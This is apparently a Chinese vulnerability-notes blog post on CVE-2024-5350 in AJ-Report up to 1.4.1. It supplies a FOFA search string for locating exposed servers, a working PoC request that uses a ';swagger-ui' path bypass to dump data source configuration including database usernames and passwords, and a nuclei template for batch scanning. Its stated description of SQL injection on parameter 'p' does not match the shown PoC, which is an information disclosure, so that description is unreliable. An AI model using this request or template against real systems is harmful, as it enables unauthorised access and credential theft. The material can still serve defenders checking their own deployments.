免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

AJ-Report pageList sql注入漏洞

漏洞影响

AJ-Report up to 1.4.1

漏洞描述

AJ-Report up to 1.4.1的漏洞已被发现,被分类为关键。受影响的是/pageList文件中的pageList函数。对参数p的操纵会导致sql注入。攻击可以远程发起。漏洞已被披露给公众,并可能被利用。

FOFA搜索语句

title="AJ-Report"

漏洞分析

com.anji.plus.gaea.curd.controller.GaeaBaseController#pageList

直接查询dataSource的信息,然后把Dto信息全部直接放回,造成泄漏

Dto⾥⾯存在Collections集合,直接把配置信息放回出来。


可以拿到数据库账号密码

POC数据包

GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

get请求也可以直接使用浏览器访问

http://x.x.x.x/;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10

漏洞复现成功

批量漏洞扫描 poc

nuclei poc文件内容如下


id: CVE-2024-5350

info:
  name: AJ-Report pageList sql注入漏洞
  author: fgz
  severity: critical
  description: AJ-Report up to 1.4.1的漏洞已被发现,被分类为关键。受影响的是/pageList文件中的pageList函数。对参数p的操纵会导致sql注入。攻击可以远程发起。漏洞已被披露给公众,并可能被利用。
  metadata:
    max-request: 1
    fofa-query: title="AJ-Report"
    verified: true

requests:
  - raw:
      - |+
        GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'username') && contains(body, 'password')"

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。